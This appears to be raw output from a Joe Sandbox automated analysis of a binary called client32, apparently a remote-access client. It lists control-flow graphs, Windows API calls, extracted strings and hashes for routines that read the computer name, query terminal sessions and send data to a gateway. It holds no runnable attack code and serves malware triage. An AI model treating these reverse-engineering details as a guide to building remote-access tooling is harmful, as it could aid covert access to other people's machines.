                                                                                                                                                                                                    • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer
                                                                                                                                                                                                    • String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll$Zv
                                                                                                                                                                                                    • API String ID: 1204707258-572506831
                                                                                                                                                                                                    • Opcode ID: 665e3ab546c8d01ad812599e4808584227d69fbc25d52b505f28837da7894551
                                                                                                                                                                                                    • Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 665e3ab546c8d01ad812599e4808584227d69fbc25d52b505f28837da7894551
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1602 1102d679 1603 1102d680-1102d691 1602->1603 1603->1603 1604 1102d693 1603->1604 1605 1102d7d4-1102d7ed call 1113f130 1604->1605 1608 1102d7f3-1102d7f5 1605->1608 1609 1102d670-1102d673 1605->1609 1610 1102d8f3-1102d90d call 111429e0 1608->1610 1611 1102d7fb-1102d801 1608->1611 1612 1102d675-1102d677 1609->1612 1613 1102d698-1102d6a1 1609->1613 1633 1102d963-1102d96f call 1102b120 1610->1633 1634 1102d90f-1102d928 call 1105d340 1610->1634 1616 1102d803-1102d812 call 11141430 1611->1616 1617 1102d818-1102d828 1611->1617 1612->1603 1613->1605 1614 1102d6a7-1102d6ae 1613->1614 1614->1605 1618 1102d7a3-1102d7b8 call 1115f5b7 1614->1618 1619 1102d6b5-1102d6b7 1614->1619 1620 1102d7ba-1102d7cf call 1115f5b7 1614->1620 1621 1102d74a-1102d77d call 1115e091 call 1113e8f0 1614->1621 1622 1102d78b-1102d7a1 call 11160790 1614->1622 1623 1102d73b-1102d745 1614->1623 1624 1102d77f-1102d789 1614->1624 1625 1102d6fc-1102d702 1614->1625 1626 1102d72c-1102d736 1614->1626 1616->1617 1629 1102d82a 1617->1629 1630 1102d82f-1102d84d call 1102c850 1617->1630 1618->1605 1619->1605 1632 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1619->1632 1620->1605 1621->1605 1622->1605 1623->1605 1624->1605 1636 1102d704-1102d718 call 1115f5b7 1625->1636 1637 1102d71d-1102d727 1625->1637 1626->1605 1629->1630 1630->1610 1654 1102d853-1102d878 call 110b6bd0 call 11142a60 1630->1654 1632->1605 1658 1102d971-1102d978 1633->1658 1659 1102d948-1102d94f 1633->1659 1634->1633 1662 1102d92a-1102d93c 1634->1662 1636->1605 1637->1605 1685 1102d883-1102d889 1654->1685 1686 1102d87a-1102d881 1654->1686 1664 1102d955-1102d958 1658->1664 1667 1102d97a-1102d984 1658->1667 1659->1664 1665 1102db5a-1102db7b GetComputerNameA 1659->1665 1662->1633 1679 1102d93e 1662->1679 1668 1102d95a-1102d961 call 110b6bd0 1664->1668 1669 1102d989 1664->1669 1674 1102dbb3-1102dbb9 1665->1674 1675 1102db7d-1102dbb1 call 110278a0 1665->1675 1667->1665 1682 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1668->1682 1669->1682 1676 1102dbbb-1102dbc0 1674->1676 1677 1102dbef-1102dc02 call 11160790 1674->1677 1675->1674 1704 1102dc07-1102dc13 1675->1704 1684 1102dbc6-1102dbca 1676->1684 1703 1102ddf7-1102de1a call 11087b10 1677->1703 1679->1659 1733 1102db2a-1102db32 SetLastError 1682->1733 1734 1102da6c-1102da83 1682->1734 1690 1102dbe6-1102dbe8 1684->1690 1691 1102dbcc-1102dbce 1684->1691 1693 1102d88b-1102d892 call 110279d0 1685->1693 1694 1102d8e9 1685->1694 1686->1610 1701 1102dbeb-1102dbed 1690->1701 1698 1102dbe2-1102dbe4 1691->1698 1699 1102dbd0-1102dbd6 1691->1699 1693->1694 1709 1102d894-1102d8c6 1693->1709 1694->1610 1698->1701 1699->1690 1705 1102dbd8-1102dbe0 1699->1705 1701->1677 1701->1704 1713 1102de42-1102de4a 1703->1713 1714 1102de1c-1102de22 1703->1714 1710 1102dc15-1102dc2a call 110b6bd0 call 11029870 1704->1710 1711 1102dc2c-1102dc3f call 11080b10 1704->1711 1705->1684 1705->1698 1731 1102d8d0-1102d8df call 110f3da0 1709->1731 1732 1102d8c8-1102d8ce 1709->1732 1746 1102dc83-1102dc9c call 11080b10 1710->1746 1729 1102dc41-1102dc64 1711->1729 1730 1102dc66-1102dc68 1711->1730 1723 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1713->1723 1724 1102de4c-1102de59 call 1113f120 call 1115e091 1713->1724 1714->1713 1721 1102de24-1102de3d call 1102cde0 1714->1721 1721->1713 1724->1723 1729->1746 1738 1102dc70-1102dc81 1730->1738 1739 1102d8e2-1102d8e4 call 1102cde0 1731->1739 1732->1731 1732->1739 1748 1102daf3-1102daff 1733->1748 1734->1748 1756 1102da85-1102da8e 1734->1756 1738->1738 1738->1746 1739->1694 1766 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1746->1766 1767 1102dddc-1102dde9 call 11160790 1746->1767 1750 1102db42-1102db51 1748->1750 1751 1102db01-1102db0d 1748->1751 1750->1665 1760 1102db53-1102db54 FreeLibrary 1750->1760 1757 1102db1f-1102db23 1751->1757 1758 1102db0f-1102db1d GetProcAddress 1751->1758 1756->1748 1764 1102da90-1102dac6 call 11142a60 call 11128350 1756->1764 1762 1102db34-1102db36 SetLastError 1757->1762 1763 1102db25-1102db28 1757->1763 1758->1757 1760->1665 1770 1102db3c 1762->1770 1763->1770 1764->1748 1786 1102dac8-1102daee call 11142a60 call 11027590 1764->1786 1802 1102dd33-1102dd49 call 11125f90 1766->1802 1803 1102dd1f-1102dd2e call 110290f0 1766->1803 1779 1102ddec-1102ddf1 CharUpperA 1767->1779 1770->1750 1779->1703 1786->1748 1807 1102dd62-1102dd9c call 110ce900 * 2 1802->1807 1808 1102dd4b-1102dd5d call 110ce900 1802->1808 1803->1802 1815 1102ddb2-1102ddda call 11160790 call 110ce4f0 1807->1815 1816 1102dd9e-1102ddad call 110290f0 1807->1816 1808->1807 1815->1779 1816->1815
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: $141700$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 1029625771-3390026015
                                                                                                                                                                                                    • Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                                                                                    • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1823 689b63c0-689b6402 call 689d4710 EnterCriticalSection InterlockedDecrement 1826 689b6408-689b641f EnterCriticalSection 1823->1826 1827 689b65ed-689b6608 LeaveCriticalSection call 689d28e1 1823->1827 1829 689b64da-689b64e0 1826->1829 1830 689b6425-689b6431 1826->1830 1834 689b65bd-689b65e8 call 689d1c50 LeaveCriticalSection 1829->1834 1835 689b64e6-689b64f0 shutdown 1829->1835 1832 689b6443-689b6447 1830->1832 1833 689b6433-689b6441 GetProcAddress 1830->1833 1837 689b6449-689b644c 1832->1837 1838 689b644e-689b6450 SetLastError 1832->1838 1833->1832 1834->1827 1839 689b650a-689b652d timeGetTime #16 1835->1839 1840 689b64f2-689b6507 GetLastError call 689b30a0 1835->1840 1844 689b6456-689b6465 1837->1844 1838->1844 1841 689b652f 1839->1841 1842 689b656c-689b656e 1839->1842 1840->1839 1846 689b6551-689b656a #16 1841->1846 1847 689b6531 1841->1847 1848 689b6570-689b657b closesocket 1842->1848 1850 689b6477-689b647b 1844->1850 1851 689b6467-689b6475 GetProcAddress 1844->1851 1846->1841 1846->1842 1847->1846 1855 689b6533-689b653e GetLastError 1847->1855 1856 689b657d-689b658a WSAGetLastError 1848->1856 1857 689b65b6 1848->1857 1853 689b647d-689b6480 1850->1853 1854 689b6482-689b6484 SetLastError 1850->1854 1851->1850 1858 689b648a-689b6499 1853->1858 1854->1858 1855->1842 1859 689b6540-689b6547 timeGetTime 1855->1859 1860 689b658c-689b658e Sleep 1856->1860 1861 689b6594-689b6598 1856->1861 1857->1834 1863 689b64ab-689b64af 1858->1863 1864 689b649b-689b64a9 GetProcAddress 1858->1864 1859->1842 1865 689b6549-689b654b Sleep 1859->1865 1860->1861 1861->1848 1866 689b659a-689b659c 1861->1866 1867 689b64c3-689b64d5 SetLastError 1863->1867 1868 689b64b1-689b64be 1863->1868 1864->1863 1865->1846 1866->1857 1869 689b659e-689b65b3 GetLastError call 689b30a0 1866->1869 1867->1834 1868->1834 1869->1857
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000000,?,00000000,?,689BD77B,00000000), ref: 689B63E8
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 689B63FA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,689BD77B,00000000), ref: 689B6412
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 689B643B
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,689BD77B,00000000), ref: 689B6450
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 689B646F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,689BD77B,00000000), ref: 689B6484
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 689B64A3
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,689BD77B,00000000), ref: 689B64C5
                                                                                                                                                                                                    • shutdown.WSOCK32(?,00000001,?,00000000,?,689BD77B,00000000), ref: 689B64E9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,00000000,?,689BD77B,00000000), ref: 689B64F2
                                                                                                                                                                                                    • timeGetTime.WINMM(?,00000001,?,00000000,?,689BD77B,00000000), ref: 689B6510
                                                                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6526
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6533
                                                                                                                                                                                                    • timeGetTime.WINMM(?,00000000,?,689BD77B,00000000), ref: 689B6540
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,00000000,?,689BD77B,00000000), ref: 689B654B
                                                                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6563
                                                                                                                                                                                                    • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6574
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B657D
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B658E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B659E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,689BD77B,00000000), ref: 689B65D7
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,00000000,?,689BD77B,00000000), ref: 689B65F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlockedclosesocketshutdown
                                                                                                                                                                                                    • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 2828415955-2631155478
                                                                                                                                                                                                    • Opcode ID: 83cdbfff6854887220eaa0c64475827b516ba9fc56cea489f2e0b96774fb4432
                                                                                                                                                                                                    • Instruction ID: f12804eefb3bbaf1705cc0173d8da3f4a077469257e2c99c6ca9f62415c715d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83cdbfff6854887220eaa0c64475827b516ba9fc56cea489f2e0b96774fb4432
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6251B176648700AFD715DF68DD88B5A73BDBF89328F904124E61AD7280DBB0F894CB64

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1873 689b98d0-689b9932 1874 689b9956-689b995e 1873->1874 1875 689b9934-689b9955 call 689b30a0 call 689d28e1 1873->1875 1877 689b9ac5-689b9acc 1874->1877 1878 689b9964-689b9979 call 689d28f0 1874->1878 1881 689b9b19-689b9b1d 1877->1881 1882 689b9ace-689b9adb 1877->1882 1878->1877 1894 689b997f-689b9994 call 689d4330 1878->1894 1883 689b9b4b-689b9b70 GetTickCount InterlockedExchange EnterCriticalSection 1881->1883 1884 689b9b1f-689b9b26 1881->1884 1887 689b9af8-689b9b07 wsprintfA 1882->1887 1888 689b9add-689b9af6 wsprintfA 1882->1888 1892 689b9b9c-689b9ba1 1883->1892 1893 689b9b72-689b9b9b LeaveCriticalSection call 689b30a0 call 689d28e1 1883->1893 1884->1883 1890 689b9b28-689b9b41 call 689b77b0 1884->1890 1889 689b9b0a-689b9b16 call 689b52b0 1887->1889 1888->1889 1889->1881 1890->1883 1911 689b9b43-689b9b45 1890->1911 1895 689b9bfb-689b9c05 1892->1895 1896 689b9ba3-689b9bd0 call 689b4dd0 1892->1896 1894->1877 1914 689b999a-689b99af call 689d28f0 1894->1914 1903 689b9c3b-689b9c47 1895->1903 1904 689b9c07-689b9c17 1895->1904 1918 689b9d4b-689b9d6c LeaveCriticalSection call 689c77e0 1896->1918 1919 689b9bd6-689b9bf6 WSAGetLastError call 689b30a0 1896->1919 1913 689b9c50-689b9c5a 1903->1913 1909 689b9c19-689b9c1d 1904->1909 1910 689b9c20-689b9c22 1904->1910 1909->1910 1920 689b9c1f 1909->1920 1910->1903 1921 689b9c24-689b9c36 call 689b46c0 1910->1921 1911->1883 1915 689b9d2e-689b9d3b call 689b30a0 1913->1915 1916 689b9c60-689b9c65 1913->1916 1914->1877 1931 689b99b5-689b99f1 1914->1931 1936 689b9d45 1915->1936 1924 689b9c71-689b9c9a send 1916->1924 1925 689b9c67-689b9c6b 1916->1925 1940 689b9d78-689b9d8a call 689d28e1 1918->1940 1941 689b9d6e-689b9d72 InterlockedIncrement 1918->1941 1919->1918 1920->1910 1921->1903 1932 689b9c9c-689b9c9f 1924->1932 1933 689b9cf1-689b9d0f call 689b30a0 1924->1933 1925->1915 1925->1924 1937 689b99f7-689b99ff 1931->1937 1938 689b9cbe-689b9cce WSAGetLastError 1932->1938 1939 689b9ca1-689b9cac 1932->1939 1933->1936 1936->1918 1943 689b9aa3-689b9ac2 call 689b30a0 1937->1943 1944 689b9a05-689b9a08 1937->1944 1946 689b9d11-689b9d2c call 689b30a0 1938->1946 1947 689b9cd0-689b9ce9 timeGetTime Sleep 1938->1947 1939->1936 1945 689b9cb2-689b9cbc 1939->1945 1941->1940 1943->1877 1950 689b9a0a-689b9a0c 1944->1950 1951 689b9a0e 1944->1951 1945->1947 1946->1936 1947->1913 1952 689b9cef 1947->1952 1956 689b9a14-689b9a1d 1950->1956 1951->1956 1952->1936 1959 689b9a1f-689b9a22 1956->1959 1960 689b9a8d-689b9a8e 1956->1960 1961 689b9a26-689b9a35 1959->1961 1962 689b9a24 1959->1962 1960->1943 1963 689b9a90-689b9a93 1961->1963 1964 689b9a37-689b9a3a 1961->1964 1962->1961 1965 689b9a9d 1963->1965 1966 689b9a3e-689b9a4d 1964->1966 1967 689b9a3c 1964->1967 1965->1943 1968 689b9a4f-689b9a52 1966->1968 1969 689b9a95-689b9a98 1966->1969 1967->1966 1970 689b9a56-689b9a65 1968->1970 1971 689b9a54 1968->1971 1969->1965 1972 689b9a9a 1970->1972 1973 689b9a67-689b9a6a 1970->1973 1971->1970 1972->1965 1974 689b9a6e-689b9a85 1973->1974 1975 689b9a6c 1973->1975 1974->1937 1976 689b9a8b 1974->1976 1975->1974 1976->1943
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                                                                                    • API String ID: 0-2848211065
                                                                                                                                                                                                    • Opcode ID: a6970ee6fe2fd02da8d2ea76a441d932458592c3a116e46df54a29290583b3a2
                                                                                                                                                                                                    • Instruction ID: aa02f064b3eb4e4bfab072fef5dec22bd890135ecc410541feee5449b0b06243
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6970ee6fe2fd02da8d2ea76a441d932458592c3a116e46df54a29290583b3a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07D1F475A142189FDB24CF64DC84BEEB7B8AF6A308F8440D9E81D9B241E731D985CF91

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1977 11028290-110282ad 1978 110282b3-110282e2 1977->1978 1979 11028978-1102897f 1977->1979 1980 11028370-110283b8 GetModuleFileNameA call 1115f9c0 call 1116076b 1978->1980 1981 110282e8-110282ee 1978->1981 1982 11028991-11028995 1979->1982 1983 11028981-1102898a 1979->1983 1997 110283bd 1980->1997 1985 110282f0-110282f8 1981->1985 1987 11028997-110289a9 call 1115e4d1 1982->1987 1988 110289aa-110289be call 1115e4d1 1982->1988 1983->1982 1986 1102898c 1983->1986 1985->1985 1991 110282fa-11028300 1985->1991 1986->1982 1996 11028303-11028308 1991->1996 1996->1996 1998 1102830a-11028314 1996->1998 1999 110283c0-110283ca 1997->1999 2000 11028331-11028337 1998->2000 2001 11028316-1102831d 1998->2001 2003 110283d0-110283d3 1999->2003 2004 1102896f-11028977 1999->2004 2002 11028338-1102833e 2000->2002 2005 11028320-11028326 2001->2005 2002->2002 2006 11028340-1102836e call 1116076b 2002->2006 2003->2004 2007 110283d9-110283e7 call 11026500 2003->2007 2004->1979 2005->2005 2008 11028328-1102832e 2005->2008 2006->1999 2013 110288f5-1102890a call 11160535 2007->2013 2014 110283ed-11028400 call 1115f5b7 2007->2014 2008->2000 2013->2004 2021 11028910-1102896a 2013->2021 2019 11028402-11028405 2014->2019 2020 1102840b-11028433 call 11026370 call 11026500 2014->2020 2019->2013 2019->2020 2020->2013 2026 11028439-11028456 call 110265f0 call 11026500 2020->2026 2021->2004 2031 11028865-1102886c 2026->2031 2032 1102845c 2026->2032 2033 11028892-11028899 2031->2033 2034 1102886e-11028871 2031->2034 2035 11028460-11028480 call 11026370 2032->2035 2037 110288b1-110288b8 2033->2037 2038 1102889b-110288a1 2033->2038 2034->2033 2036 11028873-1102887a 2034->2036 2045 11028482-11028485 2035->2045 2046 110284b6-110284b9 2035->2046 2043 11028880-11028890 2036->2043 2040 110288ba-110288c5 2037->2040 2041 110288c8-110288cf 2037->2041 2044 110288a7-110288af 2038->2044 2040->2041 2047 110288d1-110288db 2041->2047 2048 110288de-110288e5 2041->2048 2043->2033 2043->2043 2044->2037 2044->2044 2049 11028487-1102848e 2045->2049 2050 1102849e-110284a1 2045->2050 2052 1102884e-1102885f call 11026500 2046->2052 2053 110284bf-110284d2 call 111608d0 2046->2053 2047->2048 2048->2013 2051 110288e7-110288f2 2048->2051 2054 11028494-1102849c 2049->2054 2050->2052 2055 110284a7-110284b1 2050->2055 2051->2013 2052->2031 2052->2035 2053->2052 2060 110284d8-110284f4 call 11160e4e 2053->2060 2054->2050 2054->2054 2055->2052 2063 110284f6-110284fc 2060->2063 2064 1102850f-11028525 call 11160e4e 2060->2064 2066 11028500-11028508 2063->2066 2069 11028527-1102852d 2064->2069 2070 1102853f-11028555 call 11160e4e 2064->2070 2066->2066 2068 1102850a 2066->2068 2068->2052 2071 11028530-11028538 2069->2071 2075 11028557-1102855d 2070->2075 2076 1102856f-11028585 call 11160e4e 2070->2076 2071->2071 2073 1102853a 2071->2073 2073->2052 2077 11028560-11028568 2075->2077 2081 11028587-1102858d 2076->2081 2082 1102859f-110285b5 call 11160e4e 2076->2082 2077->2077 2079 1102856a 2077->2079 2079->2052 2083 11028590-11028598 2081->2083 2087 110285b7-110285bd 2082->2087 2088 110285cf-110285e5 call 11160e4e 2082->2088 2083->2083 2085 1102859a 2083->2085 2085->2052 2089 110285c0-110285c8 2087->2089 2093 110285e7-110285ed 2088->2093 2094 110285ff-11028615 call 11160e4e 2088->2094 2089->2089 2091 110285ca 2089->2091 2091->2052 2095 110285f0-110285f8 2093->2095 2099 11028617-1102861d 2094->2099 2100 1102862f-11028645 call 11160e4e 2094->2100 2095->2095 2098 110285fa 2095->2098 2098->2052 2101 11028620-11028628 2099->2101 2105 11028647-1102864d 2100->2105 2106 1102865f-11028675 call 11160e4e 2100->2106 2101->2101 2103 1102862a 2101->2103 2103->2052 2107 11028650-11028658 2105->2107 2111 11028677-1102867d 2106->2111 2112 1102868f-110286a5 call 11160e4e 2106->2112 2107->2107 2109 1102865a 2107->2109 2109->2052 2114 11028680-11028688 2111->2114 2117 110286a7-110286ad 2112->2117 2118 110286bf-110286d5 call 11160e4e 2112->2118 2114->2114 2116 1102868a 2114->2116 2116->2052 2119 110286b0-110286b8 2117->2119 2123 110286d7-110286dd 2118->2123 2124 110286ef-11028705 call 11160e4e 2118->2124 2119->2119 2121 110286ba 2119->2121 2121->2052 2125 110286e0-110286e8 2123->2125 2129 11028726-1102873c call 11160e4e 2124->2129 2130 11028707-1102870d 2124->2130 2125->2125 2127 110286ea 2125->2127 2127->2052 2135 11028753-11028769 call 11160e4e 2129->2135 2136 1102873e 2129->2136 2131 11028717-1102871f 2130->2131 2131->2131 2133 11028721 2131->2133 2133->2052 2141 11028780-11028796 call 11160e4e 2135->2141 2142 1102876b 2135->2142 2137 11028744-1102874c 2136->2137 2137->2137 2139 1102874e 2137->2139 2139->2052 2147 110287b7-110287cd call 11160e4e 2141->2147 2148 11028798-1102879e 2141->2148 2143 11028771-11028779 2142->2143 2143->2143 2146 1102877b 2143->2146 2146->2052 2153 110287ef-11028805 call 11160e4e 2147->2153 2154 110287cf-110287df 2147->2154 2149 110287a8-110287b0 2148->2149 2149->2149 2151 110287b2 2149->2151 2151->2052 2159 11028807-1102880d 2153->2159 2160 1102881c-11028832 call 11160e4e 2153->2160 2155 110287e0-110287e8 2154->2155 2155->2155 2157 110287ea 2155->2157 2157->2052 2162 11028810-11028818 2159->2162 2160->2052 2165 11028834-1102883a 2160->2165 2162->2162 2164 1102881a 2162->2164 2164->2052 2166 11028844-1102884c 2165->2166 2166->2052 2166->2166
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FCC1370,?,0000001A), ref: 1102837D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
